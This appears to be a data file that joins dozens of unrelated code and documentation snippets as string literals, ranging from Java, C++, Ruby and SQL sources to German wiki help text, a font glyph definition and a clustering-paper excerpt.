}\n\n /**\n * @return The cookie.\n */\n public String getCookie() {\n return cookie;\n }\n\n /**\n * @param cookie The cookie.\n */\n public void setCookie(final String cookie) {\n this.cookie = cookie;\n }\n}" +"DocType is the basic building block of an application and encompasses all the three elements i.e. model, view and controller. It represents a:\n\n- Table in the database\n- Form in the application\n- Controller (class) to execute business logic\n\n#### Single Type\n\nDocTypes can be of \"Single\" type where they do not represent a table, and only one instance is maintained. This can be used where the DocType is required only for its view features or to store some configurations in one place.\n\n#### Child Tables\n\nDocTypes can be child tables of other DocTypes. In such cases, they must defined `parent`, `parenttype` and `parentfield` properties to uniquely identify its placement.\n\nIn the parent DocType, the position of a child in the field sequence is defined by the `Table` field type." +"\n/* \n * Useful to avoid writing DGtal:: in front of every class.\n */\nnamespace DGtal {\n\n/**\n \n@page moduleCubicalComplex Cubical Complex\n\n@writers Jacques-Olivier Lachaud\n\n@since 0.9.1\n\nPart of the \\ref packageTopology.\n \nThis part of the manual describes how to represent and process\narbitrary cubical complexes. \n\n@note Collapse operation is a backport from \\e ImaGene.\n@cite ImaGene \n\n[TOC]\n\n\nThe following programs are related to this documentation:\ncubical-complex-collapse.cpp, cubical-complex-illustrations.cpp,\ntestCubicalComplex.cpp, cubicalComplexThinning.cpp.\n\n@section dgtal_ccomplex_sec1 Introduction to cubical complexes\n\nWe define a \\b cubical \\b complex \\a C as a collection of cells living\nin some Khalimsky space. Two cells of \\a C are \\b incident if and only\nif they are incident in the Khalimsky space. A cubical complex\nprovides many services related to set of (unsigned) cells living in a\nKhalimsky space: incidence operations, closure, star, link, cell set\noperations, cell set relations, collapse operation. \n\n\n@note In opposition to the usual definition of simplical complex, we\ndo not require that all faces of a cell of \\a C belong also to \\a C.\n\n@note A digital surface is not a cubical complex, because it does not\ncontain explicitely cells of dimension lower than n-1 and because it\nrequires some sort of orientation." +"/* This is example code provided to the student */\n//start\n#include \"carddeck.h\"\n#include <QtWidgets>\n#include <QTextStream>\n\nint main(int argc, char* argv[]) {\n QApplication app(argc, argv);\n QTextStream cout(stdout); \n CardDeck deck;\n\n\n CardHand hand;\n int handSize, playerScore, progScore;\n cout << \"How many cards in a hand? \" << flush;\n handSize = QInputDialog::getInt(0, QString(\"getInt()\"),\n QString(\"How many cards in hand?\"), 1, 5);\n QMessageBox::StandardButton sb;\n do {\n hand = deck.deal(handSize);\n cout << \"Here is your hand:\" << endl;\n cout << hand.toString() << endl;\n playerScore = hand.getValue();\n cout << QString(\"Your score is: %1 points.\")\n .arg(playerScore) << endl;\n // Now a hand for the dealer:\n hand = deck.deal(handSize);\n progScore = hand.getValue();\n cout << \"Here is my hand:\" << endl;\n cout << hand.toString() << endl;\n cout << QString(\"My score is: %1 points.\")\n .arg(progScore) << endl;\n cout << QString(\"%1 win!!\")\n .arg((playerScore > progScore)?\"You\":\"I\") << endl;\n sb = QMessageBox::question(0, QString(\"QMessageBox::question()\"),\n QString(\"Another hand?\"), QMessageBox::Yes | QMessageBox::No);\n } while (sb == QMessageBox::Yes);\n return 0;\n}" +"# -*- coding: utf-8 -*-\n# Copyright (C) 2012 Anaconda, Inc\n# SPDX-License-Identifier: BSD-3-Clause\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport sys\n\nfrom .common import check_non_admin, specs_from_args\nfrom .install import handle_txn\nfrom ..base.context import context\nfrom ..core.envs_manager import unregister_env\nfrom ..core.link import PrefixSetup, UnlinkLinkTransaction\nfrom ..core.prefix_data import PrefixData\nfrom ..core.solve import Solver\nfrom ..exceptions import CondaEnvironmentError, CondaValueError\nfrom ..gateways.disk.delete import rm_rf, path_is_clean\nfrom ..models.match_spec import MatchSpec\n\nlog = logging.getLogger(__name__)\n\n\ndef execute(args, parser):\n\n if not (args.all or args.package_names):\n raise CondaValueError('no package names supplied,\\n'\n ' try \"conda remove -h\" for more details')\n\n prefix = context.target_prefix\n check_non_admin()\n\n if args.all and prefix == context.default_prefix:\n msg = \"cannot remove current environment. deactivate and run conda remove again\"\n raise CondaEnvironmentError(msg)\n\n if args.all and path_is_clean(prefix):\n # full environment removal was requested, but environment doesn't exist anyway\n\n # .. but you know what? If you call `conda remove --all` you'd expect the dir\n # not to exist afterwards, would you not? If not (fine, I can see the argument\n # about deleting people's work in envs being a very bad thing indeed), but if\n # being careful is the goal it would still be nice if after `conda remove --all`\n # to be able to" +"caption: Zeilenumbruch\ncreated: 20131214165710101\ncreator: pmario\nmodified: 20140922133054642\nmodifier: ChrisK\ntags: WikiText\ntitle: Zeilenumbruch in WikiText\ntype: text/vnd.tiddlywiki\n\n!! Block Syntax\nDie \u00fcbliche Behandlung von [[Abs\u00e4tzen in WikiText|Absatz in WikiText]] ignoriert einzelne Zeilenumbr\u00fcche. Zwei Zeilenumbr\u00fcche werden als neuer Absatz interpretiert. \n\nUm trotzdem Texte mit \"hartem\" Zeilenumbruch darstellen zu k\u00f6nnen, zum Beispiel: \"Gedichte\", kann folgende Formatierung verwendet werden:\n\n<<wikitext-example src:'\"\"\"\nLoch in die Erde,\nBronze rin.\nGlocke fertig,\nbim, bim, bim.\n\"\"\"'>>\n\n!! HTML Syntax\n\nIn normalem Flie\u00dftext sollten keine zus\u00e4tzlichen \"harten\" Zeilenumbr\u00fcche eingef\u00fcgt werden, da diese bei unterschiedlichen Anzeigen zB: Handy's falsch dargestellt werden. \n\nIn Ausnahmef\u00e4llen sollte es jedoch m\u00f6glich sein, einen \"harten\" Zeilenumbruch zu setzen. Daf\u00fcr kann der HTML `<br>` \"tag\" verwendet werden. \n\n```\nErste Zeile <br/>\nZweite Zeile\n```\n\nDargestellt als: \n\nErste Zeile <br/>\nZweite Zeile\n\nHTML Code: \n\n```\n<p>Erste Zeile <br/>Zweite Zeile</p>\n```" +"var Symtable = exports.SymbolTable = function(){\n\n}\n/**\n * ## TODO:\n * \n * 1. Global\n * 2. Local\n * 3. Struct\n * 4. AtMethod Scope\n */\n\nvar Scope = exports.Scope = function(parentScope){\n // this.scopeName = scopeName;\n this.parentScope = parentScope;\n this.symtable = {};\n this.isStruct = false;\n}\n\nScope.prototype = {\n getSpace: function(){\n return this.symtable;\n },\n resolve: function(name, first){\n var scope = this;\n while(scope){\n var symbol = scope.symtable[name];\n if(symbol) return symbol;\n else{\n if(first) return;\n scope = scope.parentScope;\n }\n }\n },\n define: function(name, value){\n this.symtable[name] = value;\n return this;\n },\n getSymbol: function(name) {\n return this.symtable[name];\n },\n getOuterScope: function(){\n return this.parentScope;\n },\n has: function(value){\n var symtable = this.symtable;\n for(var i in symtable) if (symtable.hasOwnProperty(i)){\n if(symtable[i] == value ){\n return true\n }\n }\n return false;\n },\n toStruct: function(){\n var scope = new Scope();\n scope.isStruct = true;\n scope.symtable = this.symtable\n return scope;\n }\n}" +".. include:: defs.rst\n\nOptimal control with |casadi|\n=============================\n\n\n|casadi| can be used to solve *optimal control problems* (OCP) using a variety of methods, including direct (a.k.a. *discretize-then-optimize*) and indirect (a.k.a. *optimize-then-discretize*) methods, all-at-once (e.g. collocation) methods and shooting-methods requiring embedded solvers of initial value problems in ODE or DAE. As a user, you are in general expected to *write your own OCP solver* and |casadi| aims as making this as easy as possible by providing powerful high-level building blocks. Since you are writing the solver yourself (rather than calling an existing \"black-box\" solver), a basic understanding of how to solve OCPs is indispensable. Good, self-contained introductions to numerical optimal control can be found in the recent textbooks by Biegler [#f4]_ or Betts [#f5]_ or Moritz Diehl's `lecture notes on numerical optimal control <https://www.syscop.de/files/2015ws/numopt/numopt_0.pdf>`_.\n\nA simple test problem\n---------------------\n\nTo illustrate some of the methods, we will consider the following test problem,\nnamely driving a *Van der Pol* oscillator to the origin, while trying to\nminimize a quadratic cost:\n\n.. math::\n :label: vdp\n\n \\begin{array}{lc}\n \\begin{array}{l}\n \\text{minimize:} \\\\\n x(\\cdot) \\in \\mathbb{R}^2, \\, u(\\cdot) \\in \\mathbb{R}\n \\end{array}\n \\quad \\displaystyle \\int_{t=0}^{T}{(x_0^2 + x_1^2 + u^2) \\, dt}\n \\\\\n \\\\\n \\text{subject to:} \\\\\n \\\\\n \\begin{array}{ll}" +"//\n// Define.h\n// NuweScoreFramework\n//\n// Created by Dev Mac on 10/15/14.\n// Copyright (c) 2014 Dimitar Plamenov. All rights reserved.\n//\n\n#ifndef NuweScoreFramework_Define_h\n#define NuweScoreFramework_Define_h\n\n\n#define APP_COLOR_BACKGROUND [UIColor colorWithRed:63.0f / 255.0 green:169.0f / 255.0 blue:245.0f / 255.0 alpha:1.0]\n\n#define APP_COLOR_LIGHT_BLUE [UIColor colorWithRed:173.0 / 255.0 green:210.0 / 255.0 blue:239.0 / 255.0 alpha:1.0]\n//#define APP_COLOR_BLUE [UIColor colorWithRed:1.0 / 255.0 green:178.0 / 255.0 blue:232.0 / 255.0 alpha:1.0]\n#define APP_COLOR_BLUE [UIColor colorWithRed:63.0f / 255.0 green:169.0f / 255.0 blue:245.0f / 255.0 alpha:1.0]\n#define APP_COLOR_RED [UIColor colorWithRed:231.0 / 255.0 green:76.0 / 255.0 blue:60.0 / 255.0 alpha:1.0]\n#define APP_COLOR_GREY [UIColor colorWithRed:0.471 green:0.471 blue:0.471 alpha:1] /*#787878*/\n\n\n#endif" +"Most dialogs have a help button that takes you to the relevant online documentation\r\nYou can use \"Ctrl + [\" or \"Ctrl + ]\" to indent/outdent a block of code in Coder view\r\nBoth in the Coder and Builder views have a demos menu with plenty of demos. There are more on Pavlovia.org\r\nFrom Builder you can use \"Compile\" to generate the Python script that controls your experiment, and view or edit it in the Coder. (Any edits are not reflected back in the Builder, however.)\r\nYou should avoid snorting Pepsi\r\nMost buttons have helpful usage tips if you hover over them\r\nPsychoPy can handle many different units (degrees of visual angle, cm...) for your stimuli. But you need to tell it about your monitor first (see the online documentation on General > Units)\r\nMenu items show you the current key bindings (which can be configured in preferences)\r\nFor brief stimuli, you should use frames rather than time to set the start/stop of your stimuli. Most monitor frame rates are precise to the microsecond!\r\nIt's a really good idea to check your data are all being saved as you like BEFORE running all of your participants!\r\nBuilder: right-clicking on any" +"IfsCompose\n----------\n\nIfsCompose is a plug-in for GIMP that allows\nthe creation of Iterated Function System fractals by direct\nmanipulation onscreen of the component transforms.\n\n\nIFS Fractals\n------------\n\nYou may be familiar with IFS's from the screen\nhack 'Flame'. They are also the basis of fractal image compression.\n\nFor a brief introduction to IFS's see Foley and van Dam, et\nal,. _Computer Graphics, Principles and Practice_, 2nd Ed., \n(Addison Wesley, 1990).\n\nThe standard references in the field are Michael Barnsley's books (though\nI haven't looked at them yet):\n\nM. Barnsley, _Fractals Everywhere_, Academic Press Inc., 1988.\nM. Barnsley and L. Hurd, _Fractal Image Compression_, Jones and\nBartlett.\n\nBriefly, you take a point and repeatedly apply one of a set of\ntransformations to it, choosing randomly between them, and plot the\npoint at each step. An interesting result (the Collage Theorem) says\nthat if you can find a set of transformations that break up an image\ninto smaller copies of itself, then the resulting fractal exactly\nreproduces the original image. For example, here is a classic image\nof a leaf and the same image with the four component transforms\ncolored distinctively.\n\nBut the best way to appreciate this may to install" +"StartChar: afii10040\nEncoding: 1062 1062 774\nWidth: 1060\nFlags: W\nHStem: 0 150<220 697> 1276 20G<61.9537 220 698.965 856>\nVStem: 59 161<150 1296> 697 158<158 1296> 855 147<-259.94 0>\nLayerCount: 2\nBack\nSplineSet\n220 150 m 1xe8\n 681 150 l 1\n 683 1296 l 1\n 840 1296 l 1\n 839 158 l 1xf0\n 988 158 l 1\n 987 128 986 95 986 61 c 0\n 986 -52 994 -178 1026 -264 c 1\n 887 -299 l 1\n 854 -210 841 -110 839 0 c 1\n 682 0 l 1\n 59 -1 l 1\n 62 1296 l 1\n 220 1296 l 1\n 220 150 l 1xe8\nEndSplineSet\nFore\nSplineSet\n220 150 m 1xe8\n 697 150 l 1\n 699 1296 l 1\n 856 1296 l 1\n 855 158 l 1xf0\n 1004 158 l 1\n 1003 128 1002 95 1002 61 c 0\n 1002 -52 1010 -178 1042 -264 c 1\n 903 -299 l 1\n 870 -210 857 -110 855 0 c 1\n 698 0 l 1\n 59 -1 l 1\n 62 1296 l 1\n 220 1296 l 1\n 220 150 l 1xe8\nEndSplineSet\nValidated: 1\nEndChar" +"module Xcodeproj\n class Project\n module Object\n # This class represents a custom build rule of a Target.\n #\n class PBXBuildRule < AbstractObject\n # @!group Attributes\n\n # @return [String] the name of the rule.\n #\n attribute :name, String\n\n # @return [String] a string representing what compiler to use.\n #\n # @example\n # `com.apple.compilers.proxy.script`.\n #\n attribute :compiler_spec, String\n\n # @return [String] the type of the files that should be processed by\n # this rule.\n #\n # @example\n # `pattern.proxy`.\n #\n attribute :file_type, String\n\n # @return [String] the pattern of the files that should be processed by\n # this rule. This attribute is an alternative to to\n # `file_type`.\n #\n # @example\n # `*.css`.\n #\n attribute :file_patterns, String\n\n # @return [String] whether the rule is editable.\n #\n # @example\n # `1`.\n #\n attribute :is_editable, String, '1'\n\n # @return [ObjectList<PBXFileReference>] the file references for the\n # output files.\n #\n attribute :output_files, Array\n\n # @return [ObjectList<String>] the compiler flags used when creating the\n # respective output files.\n #\n attribute :output_files_compiler_flags, Array\n\n # @return [String] the content of the script to use for the build rule.\n #\n # @note This attribute is present if the #{#compiler_spec} is\n # `com.apple.compilers.proxy.script`\n #\n attribute :script, String\n\n # @!group Helpers" +"package milkman.ui.plugin;\n\nimport milkman.domain.RequestContainer;\nimport milkman.domain.RequestExecutionContext;\nimport milkman.domain.ResponseContainer;\n\nimport java.util.List;\n\n/**\n* extension point for adding aspects to a request.\n*/\npublic interface RequestAspectsPlugin extends Orderable {\n\n /**\n * returns a list of RequestAspectEditors that this plugin provides\n */\n\tList<RequestAspectEditor> getRequestTabs();\n\n /**\n * returns a list of ResponseAspectEditor that this plugin provides\n */\n\tList<ResponseAspectEditor> getResponseTabs();\n\n\t/**\n\t * will be called to add custom aspects to a container.\n\t *\n\t * will be called on creation of requests as well as on displaying requests.\n\t * Second is done because you might drop-in plugins, so existing requests will be enriched on-the-fly.\n * Therefore you have to make sure that aspects are only added if they are not yet existing.\n\t */\n\tvoid initializeRequestAspects(RequestContainer request);\n\n\t/**\n\t * will be called just before execution of a request\n\t * @param request\n\t */\n\tdefault void beforeRequestExecution(RequestContainer request, RequestExecutionContext context) {};\n\n\t/**\n\t * will be called to add custom aspects to a container.\n\t * will be called on creation of a response.\n\t */\n\tvoid initializeResponseAspects(RequestContainer request, ResponseContainer response, RequestExecutionContext context);\n\n}" +"[System.Collections.ArrayList]$queue = @()\n# isEmpty?\nif ($queue.Count -eq 0) {\n \"isEmpty? result : the queue is empty\"\n} else {\n \"isEmpty? result : the queue is not empty\"\n}\n\"the queue contains : $queue\"\n$queue += 1 # push\n\"push result : $queue\"\n$queue += 2 # push\n$queue += 3 # push\n\"push result : $queue\"\n\n$queue.RemoveAt(0) # pop\n\"pop result : $queue\"\n\n$queue.RemoveAt(0) # pop\n\"pop result : $queue\"\n\nif ($queue.Count -eq 0) {\n \"isEmpty? result : the queue is empty\"\n} else {\n \"isEmpty? result : the queue is not empty\"\n}\n\"the queue contains : $queue\"" +"-- This file and its contents are licensed under the Apache License 2.0.\n-- Please see the included NOTICE for copyright information and\n-- LICENSE-APACHE for a copy of the license.\n\nCREATE OR REPLACE FUNCTION add_job(\n proc REGPROC,\n schedule_interval INTERVAL,\n config JSONB DEFAULT NULL,\n initial_start TIMESTAMPTZ DEFAULT NULL,\n scheduled BOOL DEFAULT true\n) RETURNS INTEGER AS '@MODULE_PATHNAME@', 'ts_job_add' LANGUAGE C VOLATILE;\n\nCREATE OR REPLACE FUNCTION delete_job(job_id INTEGER) RETURNS VOID AS '@MODULE_PATHNAME@', 'ts_job_delete' LANGUAGE C VOLATILE STRICT;\nCREATE OR REPLACE PROCEDURE run_job(job_id INTEGER) AS '@MODULE_PATHNAME@', 'ts_job_run' LANGUAGE C;\n\n-- Returns the updated job schedule values\nCREATE OR REPLACE FUNCTION alter_job(\n job_id INTEGER,\n schedule_interval INTERVAL = NULL,\n max_runtime INTERVAL = NULL,\n max_retries INTEGER = NULL,\n retry_period INTERVAL = NULL,\n scheduled BOOL = NULL,\n config JSONB = NULL,\n next_start TIMESTAMPTZ = NULL,\n if_exists BOOL = FALSE\n)\nRETURNS TABLE (job_id INTEGER, schedule_interval INTERVAL, max_runtime INTERVAL, max_retries INTEGER, retry_period INTERVAL, scheduled BOOL, config JSONB, next_start TIMESTAMPTZ)\nAS '@MODULE_PATHNAME@', 'ts_job_alter'\nLANGUAGE C VOLATILE;" +"# Codo - the CoffeeScript API documentation generator\n#\n# # Header 1\n#\n# This is a paragraph.\n#\n# ## Header 2\n#\n# This is a paragraph.\n#\n# ### Header 3\n#\n# This is a paragraph.\n#\n# #### Header 4\n#\n# This is a paragraph.\n#\n# ##### Header 5\n#\n# This is a paragraph.\n#\n# ###### Header 6\n#\n# This is a paragraph.\n#\n# @abstract _Template methods_ must be implemented\n# @note Also notes have _now_ <del>Markdown</del>\n# @todo Allow **markdown** in todos\n#\n# @author Mickey\n# @author **Donald**\n# @copyright _No Copyright_\n# @since **1.0.0**\n# @version _1.1.0_\n# @deprecated **nobody** uses this\n#\nclass TestMarkdownDocumentation" +"---\nTitle: Transclusion\nAdded: v2.6.0\n---\n\n# Transclusion\n\nSeveral components in ADF make use of **transclusion**, which is the technique\nof incorporating user-supplied content in the body of a standard component.\n\nIn\nmost cases, this is used to make small customizations (for example, the various\nlist components let you supply custom content to show when the list is empty).\nHowever, there are also a few \"containers\" whose entire content is set by the user\nwith the container itself being mainly for convenient display and formatting\n(for example, the [Info drawer component](../core/components/info-drawer.component.md)).\n\nYou supply the content you want to transclude between the opening and closing tags of\nthe main component. In a few cases, this content can be completely free-form as with\nthe body section of the [Login component](../core/components/login.component.md):\n\n```html\n<adf-login ...>\n <div>\n <div>Your extra content</div>\n </div>\n</adf-login>\n```\n\nMore often, though, the main component makes use of one or more sub-components to add\nstructure to the transclusion. For example, the [Login component](../core/components/login.component.md)\nalso has sub-components for the header and footer regions in addition to the free-form\ncontent of the body:\n\n```html\n<adf-login ...>\n <adf-login-footer><ng-template>My custom HTML for the footer</ng-template></adf-login-footer>\n</adf-login>\n```\n\n![Custom login footer example](../docassets/images/custom-footer.png)\n\nThe doc pages for the" +"import Foundation\nimport XCTest\n\npublic extension Nef {\n\n static func run<T: XCTestCase>(testCase class: T.Type) {\n startTestObserver()\n T.defaultTestSuite.run()\n }\n\n static private func startTestObserver() {\n _ = testObserverInstalled\n }\n\n static private var testObserverInstalled = { () -> NefTestFailObserver in\n let testObserver = NefTestFailObserver()\n XCTestObservationCenter.shared.addTestObserver(testObserver)\n return testObserver\n }()\n}\n\n// MARK: enrich the output for XCTest\nfileprivate class NefTestFailObserver: NSObject, XCTestObservation {\n\n private var numberOfFailedTests = 0\n\n func testSuiteWillStart(_ testSuite: XCTestSuite) {\n numberOfFailedTests = 0\n }\n\n func testSuiteDidFinish(_ testSuite: XCTestSuite) {\n if numberOfFailedTests > 0 {\n print(\"\ud83d\udca2 Test Suite '\\(testSuite.name)' finished with \\(numberOfFailedTests) failed \\(numberOfFailedTests > 1 ? \"tests\" : \"test\").\")\n } else {\n print(\"\ud83d\udd05 Test Suite '\\(testSuite.name)' finished successfully.\")\n }\n }\n\n func testCase(_ testCase: XCTestCase,\n didFailWithDescription description: String,\n inFile filePath: String?,\n atLine lineNumber: Int) {\n\n numberOfFailedTests += 1\n print(\"\u2757\ufe0fTest Fail '\\(testCase.name)':\\(UInt(lineNumber)): \\(description.description)\")\n }\n}" +"\"\"\" WEASEL classifier\ndictionary based classifier based on SFA transform, BOSS and linear regression.\n\"\"\"\n\n__author__ = \"Patrick Sch\u00e4fer\"\n__all__ = [\"WEASEL\"]\n\nimport math\n\nimport numpy as np\nimport pandas as pd\nfrom sktime.classification.base import BaseClassifier\nfrom sktime.transformers.series_as_features.dictionary_based import SFA\nfrom sktime.utils.validation.series_as_features import check_X\nfrom sktime.utils.validation.series_as_features import check_X_y\n\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.linear_model import LogisticRegression\n# from sklearn.feature_selection import chi2\nfrom sklearn.model_selection import cross_val_score\n\n# from sktime.transformers.series_as_features.dictionary_based._sax import \\\n# _BitWord\n\n# from numba import njit\n# from numba.typed import Dict\n\n\nclass WEASEL(BaseClassifier):\n \"\"\" Word ExtrAction for time SEries cLassification (WEASEL)\n\n WEASEL: implementation of WEASEL from Sch\u00e4fer:\n @inproceedings{schafer2017fast,\n title={Fast and Accurate Time Series Classification with WEASEL},\n author={Sch{\\\"a}fer, Patrick and Leser, Ulf},\n booktitle={Proceedings of the 2017 ACM on Conference on Information and\n Knowledge Management},\n pages={637--646},\n year={2017}\n }\n # Overview: Input n series length m\n # WEASEL is a dictionary classifier that builds a bag-of-patterns using SFA\n # for different window lengths and learns a logistic regression classifier\n # on this bag.\n #\n # There are these primary parameters:\n # alphabet_size: alphabet size\n # chi2-threshold: used for feature selection to select best words\n # anova: select best l/2 fourier coefficients other than first ones\n # bigrams: using bigrams of SFA words" +"<img src=\"https://raw.github.com/hoteltonight/HTDelegateProxy/master/ht-logo-black.png\" alt=\"HotelTonight\" title=\"HotelTonight\" style=\"display:block; margin: 10px auto 30px auto;\">\n\nHTDelegateProxy\n===============\n\n# Overview\n\nHTDelegateProxy is an NSProxy subclass that allows you to assign multiple delegates to a single source. <br/>\nCheck out the associated blog post at http://engineering.hoteltonight.com/handling-multiple-delegates-in-ios\n\nHTDelegateProxy operates on two simple rules:\n\n1. Messages with a void return type are sent to all target delegates that reponds to the selector\n2. Messages with non-void return types are sent only to the <i>first</i> delegate in the list that responds to the selector.\n\nThis pattern seems to be effective in identifying which messages are informative (hey, something happened) and which messages are more complex interactions (how should I do this?).\n\n# Installation\n\n### CocoaPods users:\nAdd the following line to your Podfile: <br/>\npod 'HTDelegateProxy', '~> 0.0.2'\n\n### Everyone else:\nAdd the HTDelegateProxy.m/h files to your project.\n\n# Usage\n\nDelegates are not retained, so you have to maintain a strong reference to your HTDelegateProxy instance. <br/>\n\nFor example, you may assign multiple delegates to a UIScrollView by using HTDelegateProxy as follows:\n### In your interface: <br/>\n \n #import \"HTDelegateProxy.h\"\n ...\n @property (nonatomic, strong) UIScrollView *scrollView;\n @property (nonatomic, strong) HTDelegateProxy *delegateProxy;\n ...\n\n### In your class:\n\n ...\n self.scrollView = [[UIScrollView alloc]" +"'use strict';\n\nvar Caml_int32 = require(\"../../lib/js/caml_int32.js\");\n\nfunction f(param) {\n var exit = 0;\n switch (param.tag | 0) {\n case 0 : \n var match = param[0];\n if (match.tag) {\n var a = match[0];\n return a - a | 0;\n } else {\n var a$1 = match[0];\n return a$1 + a$1 | 0;\n }\n case 1 : \n case 2 : \n exit = 1;\n break;\n \n }\n if (exit === 1) {\n var a$2 = param[0][0];\n return Caml_int32.imul(a$2, a$2);\n }\n \n}\n\nfunction ff(c) {\n c[0] = c[0] + 1 | 0;\n var match = (1 + c[0] | 0) + 1 | 0;\n if (match > 3 || match < 0) {\n return 0;\n } else {\n return match + 1 | 0;\n }\n}\n\nexports.f = f;\nexports.ff = ff;\n/* No side effect */" +"SUMMARY = \"OpenFlow communications protocol\"\nDESCRIPTION = \"\\\nOpen standard that enables researchers to run experimental protocols in \\\ncontained networks. OpenFlow is a communications interface between \\\ncontrol and forwarding planes of a software-defined networking architecture.\\\n\"\nHOMEPAGE = \"http://www.openflow.org\"\n\nSECTION = \"net\"\nLICENSE = \"GPLv2\"\n\nLIC_FILES_CHKSUM = \"file://COPYING;md5=e870c934e2c3d6ccf085fd7cf0a1e2e2\"\n\nSRC_URI = \"git://gitosis.stanford.edu/openflow.git;protocol=git\"\n\nDEPENDS = \"virtual/libc\"\n\nPACKAGECONFIG ??= \"openssl\"\nPACKAGECONFIG[openssl] = \"--enable-ssl,--disable-ssl, openssl openssl-native, libssl\"\n\nEXTRA_OECONF += \" \\\n KARCH=${TARGET_ARCH} \\\n ${@bb.utils.contains('PACKAGECONFIG', 'openssl', 'SSL_LIBS=\"-lssl -lcrypto\"', '', d)} \\\n \"\n\nS = \"${WORKDIR}/git\"\n\ninherit autotools-brokensep pkgconfig\n\ndo_configure_prepend() {\n ./boot.sh\n}\n\ndo_install_append() {\n # Remove /var/run as it is created on startup\n rm -rf ${D}${localstatedir}/run\n}" +"#ifndef _USE_MATH_DEFINES\n#define _USE_MATH_DEFINES\n#endif\n#include <algorithm>\n#include <cstdint>\n#include <limits>\n#include <cmath>\n\n#include \"Tools/Math/utils.h\"\n\n#define REAL_COMP_PREC 1e-6\n\nnamespace aff3ct\n{\nnamespace tools\n{\ntemplate <typename R> R inline div2(R val) { return val * (R)0.500; }\ntemplate <> int32_t inline div2(int32_t val) { return val >> 1; }\ntemplate <> int16_t inline div2(int16_t val) { return val >> 1; }\ntemplate <> int8_t inline div2(int8_t val) { return val >> 1; }\n\ntemplate <typename R> R inline div4(R val) { return val * (R)0.250; }\ntemplate <> int32_t inline div4(int32_t val) { return val >> 2; }\ntemplate <> int16_t inline div4(int16_t val) { return val >> 2; }\ntemplate <> int8_t inline div4(int8_t val) { return val >> 2; }\n\ntemplate <typename R> R inline div8(R val) { return val * (R)0.125; }\ntemplate <> int32_t inline div8(int32_t val) { return val >> 3; }\ntemplate <> int16_t inline div8(int16_t val) { return val >> 3; }\ntemplate <> int8_t inline div8(int8_t val) { return val >> 3; }\n\ntemplate <typename R> R inline comp_equal(R val1, R val2) { return val1 == val2; }\ntemplate <> float inline comp_equal(float val1, float val2) { return std::abs(val1-val2)<(float )REAL_COMP_PREC;}\ntemplate <>" +"---\nauthors: Josh Wilsdon <jwilsdon@joyent.com>, Angela Fong <angela.fong@joyent.com>\nstate: publish\n---\n\n# RFD 18 Support for using labels to select networks and packages\n\n## Current support for packages/networks in sdc-docker\n\nCurrently a user creating a docker container does not select their networks in\ntheir `docker run` commandline though they can specify the -P in order to get a\nan external NIC. The external NIC is based on the default network configured\nfor the data center. The fabric network they're given is always the network\nconfigured in UFDS as the default for their account.\n\nUsers also do not directly select their package. The package is chosen based on\nthe `-m` parameter if passed (if not, we treat as 1024m). We'll find the\nsmallest package that fits their memory limit, and since all the packages have\nthe same ratios of cpu/disk/memory all the other parameters are scaled\nappropriately.\n\n\n## Impetus\n\nIn order to allow customers to specify non-default networks, we'd like the\nability for them to add these at container creation. This will allow them to use\ndifferent network setups for different containers without needing to interact\nwith cloudapi, except to create and manage the networks themselves.\n\nIn order to support SDC" +"<PAPER>\n\t<S sid=\"0\">V-Measure: A Conditional Entropy-Based External Cluster Evaluation Measure</S><ABSTRACT>\n\t\t<S sid=\"1\" ssid=\"1\">We present V-measure, an external entropybased cluster evaluation measure.</S>\n\t\t<S sid=\"2\" ssid=\"2\">V measure provides an elegant solution tomany problems that affect previously defined cluster evaluation measures includ ing 1) dependence on clustering algorithm or data set, 2) the ?problem of matching?, where the clustering of only a portion of datapoints are evaluated and 3) accurate evaluation and combination of two desirable aspects of clustering, homogeneity and completeness.</S>\n\t\t<S sid=\"3\" ssid=\"3\">We compare V-measure to a num ber of popular cluster evaluation measuresand demonstrate that it satisfies several desirable properties of clustering solutions, us ing simulated clustering results.</S>\n\t\t<S sid=\"4\" ssid=\"4\">Finally, we use V-measure to evaluate two clustering tasks: document clustering and pitch accent type clustering.</S>\n\t</ABSTRACT>\n\t<SECTION title=\"Introduction\" number=\"1\">\n\t\t\t<S sid=\"5\" ssid=\"5\">Clustering techniques have been used successfully for many natural language processing tasks, such as document clustering (Willett, 1988; Zamir and Etzioni, 1998; Cutting et al, 1992; Vempala and Wang, 2005), word sense disambiguation (Shin and Choi, 2004), semantic role labeling (Baldewein et al., 2004), pitch accent type disambiguation (Levow, 2006).</S>\n\t\t\t<S sid=\"6\" ssid=\"6\">They are particularly appealing for tasks in which there is an abundance of language data available," +"/*++ BUILD Version: 0001 // Increment this if a change has global effects\n\nCopyright (c) 1993 ACER America Corporation\n\nModule Name:\n\n acer.h\n\nAbstract:\n\n This header file defines the unique interfaces, defines and structures\n for the ACER product line\n\nRevision History:\n 1.0b - plm initial release\n 1.1b - acer.c: halpacereisa: handle scrabled eisa data gracefully.\n\n--*/\n\n#define ACER_HAL_VERSION_NUMBER \"Acer HAL Version 1.1b for October Windows NT Beta.\\n\"\n\n\n/* ACER Special I/O Port defintions\n * I/O Port Address 0xcc4h\n *\t\t\t|\n *\t\t\t0: cpu0 & cpu1\n *\t\t\tc: cpu2 & cpu3\n *\n * bits < 7 6 5 4 3 2 1 0 > (WRITE-ONLY)\n *\t 0 0 |\t0 0 | 0\t|\n *\t |\t |\tBIOS Shadow Control\n *\t |\t |\t0: ROM BIOS\n *\t |\t |\t1: RAM BIOS\n *\t |\t |\n *\t |\t |\n *\t |\t Write-Back Cache Control\n *\t |\t 0: write-thru ( write-back disabled)\n *\t |\t 1: write-back enabled\n *\t |\n *\t 15Mb to 16Mb Memory Setup\n *\t 0: Ram\n *\t 1: EISA\n *\n */\n\n\n// where do i find the CSR which controls the write-back enabling?\n#define\tACER_PORT_CPU01\t 0xcc4\t // write only - setup reg. cpu 0,1\n#define\tACER_PORT_CPU23\t 0xccc4\t // write onlY - setup" +"import { LocalCurrencyCode } from 'src/localCurrency/consts'\n\nexport enum Actions {\n FETCH_CURRENT_RATE = 'LOCAL_CURRENCY/FETCH_CURRENT_RATE',\n FETCH_CURRENT_RATE_SUCCESS = 'LOCAL_CURRENCY/FETCH_CURRENT_RATE_SUCCESS',\n FETCH_CURRENT_RATE_FAILURE = 'LOCAL_CURRENCY/FETCH_CURRENT_RATE_FAILURE',\n SELECT_PREFERRED_CURRENCY = 'LOCAL_CURRENCY/SELECT_PREFERRED_CURRENCY',\n}\nexport interface FetchCurrentRateAction {\n type: 